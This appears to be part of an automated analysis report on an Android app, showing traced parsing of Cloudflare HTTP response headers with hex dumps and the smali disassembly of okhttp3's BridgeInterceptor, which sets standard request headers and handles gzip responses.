                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 494
                          • p2: 65
                          • p3: UTF-8
                          • Return:
                            • NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        • Time: 699899
                          • This:
                            • Server: cloudflare
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 561
                          • p2: 18
                          • p3: UTF-8
                          • Return:
                            • Server: cloudflare
                        • Time: 699910
                          • This:
                            • CF-RAY: 810c84767af20d08-LAX
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 581
                          • p2: 28
                          • p3: UTF-8
                          • Return:
                            • CF-RAY: 810c84767af20d08-LAX
                        • Time: 699922
                          • This:
                            • alt-svc: h3=":443"; ma=86400
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 611
                          • p2: 28
                          • p3: UTF-8
                          • Return:
                            • alt-svc: h3=":443"; ma=86400
                        • Time: 700258
                          • This:
                            • HTTP/1.1 200 OK
                          • p0: [B@481f7c0
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOsEe1%2F4t%2FYABMwRniUtJZIjtq32IDOB6kHWlaKKu6YktqMqbfmyRadvP%2FiBnYfi%2Fuj33wXxPJy3PEHWDreijN3U8HQPKjfuamtXnPda2hKLd%2FuNLXknFZNw7AwJjzveKxc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c8476df0a2b88-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F68746D6C3B20636861727365743D7574662D380D0A5472616E736665722D456E636F64696E673A206368756E6B65640D0A436F6E6E656374696F6E3A20636C6F73650D0A566172793A204163636570742D456E636F64696E670D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D714F7345653125324634742532465941424D77526E6955744A5A496A7471333249444F42366B48576C614B4B7536596B74714D7162666D79526164765025324669426E596669253246756A3333775878504A793350454857447265696A4E3355384851504B6A6675616D74586E50646132684B4C64253246754E4C586B6E465A4E773741774A6A7A76654B7863253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F6672616374696F6E223A302C227265706F72745F746F223A2263662D6E656C222C226D61785F616765223A3630
                          • p1: 0
                          • p2: 15
                          • p3: UTF-8
                          • Return:
                            • HTTP/1.1 200 OK
                        • Time: 700278
                          • This:
                            • Date: Wed, 04 Oct 2023 09:49:53 GMT
                          • p0: [B@481f7c0
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOsEe1%2F4t%2FYABMwRniUtJZIjtq32IDOB6kHWlaKKu6YktqMqbfmyRadvP%2FiBnYfi%2Fuj33wXxPJy3PEHWDreijN3U8HQPKjfuamtXnPda2hKLd%2FuNLXknFZNw7AwJjzveKxc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c8476df0a2b88-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F68746D6C3B20636861727365743D7574662D380D0A5472616E736665722D456E636F64696E673A206368756E6B65640D0A436F6E6E656374696F6E3A20636C6F73650D0A566172793A204163636570742D456E636F64696E670D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D714F7345653125324634742532465941424D77526E6955744A5A496A7471333249444F42366B48576C614B4B7536596B74714D7162666D79526164765025324669426E596669253246756A3333775878504A793350454857447265696A4E3355384851504B6A6675616D74586E50646132684B4C64253246754E4C586B6E465A4E773741774A6A7A76654B7863253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F6672616374696F6E223A302C227265706F72745F746F223A2263662D6E656C222C226D61785F616765223A3630
                          • p1: 17
                          • p2: 35
                          • p3: UTF-8
                          • Return:
                            • Date: Wed, 04 Oct 2023 09:49:53 GMT
                        • Time: 700291
                          • This:
                            • Content-Type: text/html; charset=utf-8
                          • p0: [B@481f7c0
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOsEe1%2F4t%2FYABMwRniUtJZIjtq32IDOB6kHWlaKKu6YktqMqbfmyRadvP%2FiBnYfi%2Fuj33wXxPJy3PEHWDreijN3U8HQPKjfuamtXnPda2hKLd%2FuNLXknFZNw7AwJjzveKxc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c8476df0a2b88-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F68746D6C3B20636861727365743D7574662D380D0A5472616E736665722D456E636F64696E673A206368756E6B65640D0A436F6E6E656374696F6E3A20636C6F73650D0A566172793A204163636570742D456E636F64696E670D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D714F7345653125324634742532465941424D77526E6955744A5A496A7471333249444F42366B48576C614B4B7536596B74714D7162666D79526164765025324669426E596669253246756A3333775878504A793350454857447265696A4E3355384851504B6A6675616D74586E50646132684B4C64253246754E4C586B6E465A4E773741774A6A7A76654B7863253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F6672616374696F6E223A302C227265706F72745F746F223A2263662D6E656C222C226D61785F616765223A3630
                          • p1: 54
                          • p2: 38
                          • p3: UTF-8
                          • Return:
                            • Content-Type: text/html; charset=utf-8
                        • Time: 700307
                          • This:
                            • Transfer-Encoding: chunked
                          • p0: [B@481f7c0
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOsEe1%2F4t%2FYABMwRniUtJZIjtq32IDOB6kHWlaKKu6YktqMqbfmyRadvP%2FiBnYfi%2Fuj33wXxPJy3PEHWDreijN3U8HQPKjfuamtXnPda2hKLd%2FuNLXknFZNw7AwJjzveKxc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c8476df0a2b88-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F68746D6C3B20636861727365743D7574662D380D0A5472616E736665722D456E636F64696E673A206368756E6B65640D0A436F6E6E656374696F6E3A20636C6F73650D0A566172793A204163636570742D456E636F64696E670D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D714F7345653125324634742532465941424D77526E6955744A5A496A7471333249444F42366B48576C614B4B7536596B74714D7162666D79526164765025324669426E596669253246756A3333775878504A793350454857447265696A4E3355384851504B6A6675616D74586E50646132684B4C64253246754E4C586B6E465A4E773741774A6A7A76654B7863253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F6672616374696F6E223A302C227265706F72745F746F223A2263662D6E656C222C226D61785F616765223A3630
                          • p1: 94
                          • p2: 26
                          • p3: UTF-8
                          • Return:
                            • Transfer-Encoding: chunked
                        • Time: 700323
                          • This:
                            • Connection: close
                          • p0: [B@481f7c0
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOsEe1%2F4t%2FYABMwRniUtJZIjtq32IDOB6kHWlaKKu6YktqMqbfmyRadvP%2FiBnYfi%2Fuj33wXxPJy3PEHWDreijN3U8HQPKjfuamtXnPda2hKLd%2FuNLXknFZNw7AwJjzveKxc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c8476df0a2b88-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F68746D6C3B20636861727365743D7574662D380D0A5472616E736665722D456E636F64696E673A206368756E6B65640D0A436F6E6E656374696F6E3A20636C6F73650D0A566172793A204163636570742D456E636F64696E670D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D714F7345653125324634742532465941424D77526E6955744A5A496A7471333249444F42366B48576C614B4B7536596B74714D7162666D79526164765025324669426E596669253246756A3333775878504A793350454857447265696A4E3355384851504B6A6675616D74586E50646132684B4C64253246754E4C586B6E465A4E773741774A6A7A76654B7863253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F6672616374696F6E223A302C227265706F72745F746F223A2263662D6E656C222C226D61785F616765223A3630
                          • p1: 122
                          • p2: 17
                          • p3: UTF-8
                          • Return:
                            • Connection: close
                        • Time: 700332
                          • This:
                            • Vary: Accept-Encoding
                          • p0: [B@481f7c0
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOsEe1%2F4t%2FYABMwRniUtJZIjtq32IDOB6kHWlaKKu6YktqMqbfmyRadvP%2FiBnYfi%2Fuj33wXxPJy3PEHWDreijN3U8HQPKjfuamtXnPda2hKLd%2FuNLXknFZNw7AwJjzveKxc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c8476df0a2b88-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F68746D6C3B20636861727365743D7574662D380D0A5472616E736665722D456E636F64696E673A206368756E6B65640D0A436F6E6E656374696F6E3A20636C6F73650D0A566172793A204163636570742D456E636F64696E670D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D714F7345653125324634742532465941424D77526E6955744A5A496A7471333249444F42366B48576C614B4B7536596B74714D7162666D79526164765025324669426E596669253246756A3333775878504A793350454857447265696A4E3355384851504B6A6675616D74586E50646132684B4C64253246754E4C586B6E465A4E773741774A6A7A76654B7863253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F6672616374696F6E223A302C227265706F72745F746F223A2263662D6E656C222C226D61785F616765223A3630
                          • p1: 141
                          • p2: 21
                          • p3: UTF-8
                          • Return:
                            • Vary: Accept-Encoding
                        • 6 additional calls hidden ...
                        9move-result-object p1
                        10return-object p1
                        APIs
                        • java.lang.String.valueOf
                        • java.util.Collection.isEmpty
                        Strings
                        • chain
                        • Content-Type
                        • Content-Length
                        • application/x-www-form-urlencoded
                        • Transfer-Encoding
                        • chunked
                        • Host
                        • Connection
                        • Keep-Alive
                        • Accept-Encoding
                        • gzip
                        • Range
                        • Cookie
                        • User-Agent
                        • okhttp/4.9.0
                        • Content-Encoding
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        6const-string v0, "chain"
                        8invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        10invoke-interface {p1}, Lokhttp3/Interceptor$Chain;->request()Lokhttp3/Request;
                        11move-result-object v0
                        13invoke-virtual {v0}, Lokhttp3/Request;->newBuilder()Lokhttp3/Request$Builder;
                        14move-result-object v1
                        16invoke-virtual {v0}, Lokhttp3/Request;->body()Lokhttp3/RequestBody;
                        17move-result-object v2
                        19const-string v3, "Content-Type"
                        20const-wide/16 v4, -0x1
                        22const-string v6, "Content-Length"
                        23if-eqz v2, :cond_43
                        25invoke-virtual {v2}, Lokhttp3/RequestBody;->contentType()Lokhttp3/MediaType;
                        26move-result-object v7
                        27if-eqz v7, :cond_26
                        29invoke-virtual {v7}, Lokhttp3/MediaType;->toString()Ljava/lang/String;
                        • Time: 697754
                          • This:
                            • application/x-www-form-urlencoded
                          • Return:
                            • application/x-www-form-urlencoded
                        30move-result-object v7
                        32invoke-virtual {v1, v3, v7}, Lokhttp3/Request$Builder;->header(Ljava/lang/String;Ljava/lang/String;)Lokhttp3/Request$Builder;
                        33cond_26:
                        34invoke-virtual {v2}, Lokhttp3/RequestBody;->contentLength()J
                        35move-result-wide v7
                        37const-string v2, "Transfer-Encoding"
                        38cmp-long v9, v7, v4
                        39if-eqz v9, :cond_3b
                        41invoke-static {v7, v8}, Ljava/lang/String;->valueOf(J)Ljava/lang/String;
                        42move-result-object v7
                        44invoke-virtual {v1, v6, v7}, Lokhttp3/Request$Builder;->header(Ljava/lang/String;Ljava/lang/String;)Lokhttp3/Request$Builder;
                        46invoke-virtual {v1, v2}, Lokhttp3/Request$Builder;->removeHeader(Ljava/lang/String;)Lokhttp3/Request$Builder;
                        47goto/16 :goto_43
                        48cond_3b:
                        49const-string v7, "chunked"
                        51invoke-virtual {v1, v2, v7}, Lokhttp3/Request$Builder;->header(Ljava/lang/String;Ljava/lang/String;)Lokhttp3/Request$Builder;
                        53invoke-virtual {v1, v6}, Lokhttp3/Request$Builder;->removeHeader(Ljava/lang/String;)Lokhttp3/Request$Builder;
                        54goto_43:
                        55const-string v2, "Host"
                        57invoke-virtual {v0, v2}, Lokhttp3/Request;->header(Ljava/lang/String;)Ljava/lang/String;
                        58move-result-object v7
                        59const/4 v8, 0x0
                        60const/4 v9, 0x1
                        61const/4 v10, 0x0
                        62if-nez v7, :cond_59
                        64invoke-virtual {v0}, Lokhttp3/Request;->url()Lokhttp3/HttpUrl;
                        65move-result-object v7
                        67invoke-static {v7, v8, v9, v10}, Lokhttp3/internal/Util;->toHostHeader$default(Lokhttp3/HttpUrl;ZILjava/lang/Object;)Ljava/lang/String;
                        68move-result-object v7
                        70invoke-virtual {v1, v2, v7}, Lokhttp3/Request$Builder;->header(Ljava/lang/String;Ljava/lang/String;)Lokhttp3/Request$Builder;
                        71cond_59:
                        72const-string v2, "Connection"
                        74invoke-virtual {v0, v2}, Lokhttp3/Request;->header(Ljava/lang/String;)Ljava/lang/String;
                        75move-result-object v7
                        76if-nez v7, :cond_66
                        78const-string v7, "Keep-Alive"
                        80invoke-virtual {v1, v2, v7}, Lokhttp3/Request$Builder;->header(Ljava/lang/String;Ljava/lang/String;)Lokhttp3/Request$Builder;
                        81cond_66:
                        82const-string v2, "Accept-Encoding"
                        84invoke-virtual {v0, v2}, Lokhttp3/Request;->header(Ljava/lang/String;)Ljava/lang/String;
                        85move-result-object v7
                        87const-string v11, "gzip"
                        88if-nez v7, :cond_7c
                        90const-string v7, "Range"
                        92invoke-virtual {v0, v7}, Lokhttp3/Request;->header(Ljava/lang/String;)Ljava/lang/String;
                        93move-result-object v7
                        94if-nez v7, :cond_7c
                        96invoke-virtual {v1, v2, v11}, Lokhttp3/Request$Builder;->header(Ljava/lang/String;Ljava/lang/String;)Lokhttp3/Request$Builder;
                        97const/4 v8, 0x1
                        98cond_7c:
                        99iget-object v2, p0, Lokhttp3/internal/http/BridgeInterceptor;->cookieJar:Lokhttp3/CookieJar;
                        101invoke-virtual {v0}, Lokhttp3/Request;->url()Lokhttp3/HttpUrl;
                        102move-result-object v7
                        104invoke-interface {v2, v7}, Lokhttp3/CookieJar;->loadForRequest(Lokhttp3/HttpUrl;)Ljava/util/List;
                        105move-result-object v2
                        106move-object v7, v2
                        107check-cast v7, Ljava/util/Collection;
                        109invoke-interface {v7}, Ljava/util/Collection;->isEmpty()Z
                        110move-result v7
                        111xor-int/2addr v7, v9
                        112if-eqz v7, :cond_99
                        114invoke-direct {p0, v2}, Lokhttp3/internal/http/BridgeInterceptor;->cookieHeader(Ljava/util/List;)Ljava/lang/String;
                        115move-result-object v2
                        117const-string v7, "Cookie"
                        119invoke-virtual {v1, v7, v2}, Lokhttp3/Request$Builder;->header(Ljava/lang/String;Ljava/lang/String;)Lokhttp3/Request$Builder;
                        120cond_99:
                        121const-string v2, "User-Agent"
                        123invoke-virtual {v0, v2}, Lokhttp3/Request;->header(Ljava/lang/String;)Ljava/lang/String;
                        124move-result-object v7
                        125if-nez v7, :cond_a6
                        127const-string v7, "okhttp/4.9.0"
                        129invoke-virtual {v1, v2, v7}, Lokhttp3/Request$Builder;->header(Ljava/lang/String;Ljava/lang/String;)Lokhttp3/Request$Builder;
                        130cond_a6:
                        131invoke-virtual {v1}, Lokhttp3/Request$Builder;->build()Lokhttp3/Request;
                        132move-result-object v1
                        134invoke-interface {p1, v1}, Lokhttp3/Interceptor$Chain;->proceed(Lokhttp3/Request;)Lokhttp3/Response;
                        135move-result-object p1
                        137iget-object v1, p0, Lokhttp3/internal/http/BridgeInterceptor;->cookieJar:Lokhttp3/CookieJar;
                        139invoke-virtual {v0}, Lokhttp3/Request;->url()Lokhttp3/HttpUrl;
                        140move-result-object v2
                        142invoke-virtual {p1}, Lokhttp3/Response;->headers()Lokhttp3/Headers;
                        143move-result-object v7
                        145invoke-static {v1, v2, v7}, Lokhttp3/internal/http/HttpHeaders;->receiveHeaders(Lokhttp3/CookieJar;Lokhttp3/HttpUrl;Lokhttp3/Headers;)V
                        147invoke-virtual {p1}, Lokhttp3/Response;->newBuilder()Lokhttp3/Response$Builder;
                        148move-result-object v1
                        150invoke-virtual {v1, v0}, Lokhttp3/Response$Builder;->request(Lokhttp3/Request;)Lokhttp3/Response$Builder;
                        151move-result-object v0
                        152if-eqz v8, :cond_114
                        154const-string v1, "Content-Encoding"
                        155const/4 v2, 0x2
                        157invoke-static {p1, v1, v10, v2, v10}, Lokhttp3/Response;->header$default(Lokhttp3/Response;Ljava/lang/String;Ljava/lang/String;ILjava/lang/Object;)Ljava/lang/String;
                        158move-result-object v7
                        160invoke-static {v11, v7, v9}, Lkotlin/text/StringsKt;->equals(Ljava/lang/String;Ljava/lang/String;Z)Z
                        161move-result v7
                        162if-eqz v7, :cond_114
                        164invoke-static {p1}, Lokhttp3/internal/http/HttpHeaders;->promisesBody(Lokhttp3/Response;)Z
                        165move-result v7
                        166if-eqz v7, :cond_114
                        168invoke-virtual {p1}, Lokhttp3/Response;->body()Lokhttp3/ResponseBody;
                        169move-result-object v7
                        170if-eqz v7, :cond_114
                        171new-instance v8, Lokio/GzipSource;
                        173invoke-virtual {v7}, Lokhttp3/ResponseBody;->source()Lokio/BufferedSource;
                        174move-result-object v7
                        175check-cast v7, Lokio/Source;
                        177invoke-direct {v8, v7}, Lokio/GzipSource;-><init>(Lokio/Source;)V
                        179invoke-virtual {p1}, Lokhttp3/Response;->headers()Lokhttp3/Headers;
                        180move-result-object v7
                        182invoke-virtual {v7}, Lokhttp3/Headers;->newBuilder()Lokhttp3/Headers$Builder;
                        183move-result-object v7
                        185invoke-virtual {v7, v1}, Lokhttp3/Headers$Builder;->removeAll(Ljava/lang/String;)Lokhttp3/Headers$Builder;
                        186move-result-object v1
                        188invoke-virtual {v1, v6}, Lokhttp3/Headers$Builder;->removeAll(Ljava/lang/String;)Lokhttp3/Headers$Builder;
                        189move-result-object v1
                        191invoke-virtual {v1}, Lokhttp3/Headers$Builder;->build()Lokhttp3/Headers;
                        192move-result-object v1
                        194invoke-virtual {v0, v1}, Lokhttp3/Response$Builder;->headers(Lokhttp3/Headers;)Lokhttp3/Response$Builder;
                        196invoke-static {p1, v3, v10, v2, v10}, Lokhttp3/Response;->header$default(Lokhttp3/Response;Ljava/lang/String;Ljava/lang/String;ILjava/lang/Object;)Ljava/lang/String;
                        197move-result-object p1
                        198new-instance v1, Lokhttp3/internal/http/RealResponseBody;
                        199check-cast v8, Lokio/Source;
                        201invoke-static {v8}, Lokio/Okio;->buffer(Lokio/Source;)Lokio/BufferedSource;
                        202move-result-object v2
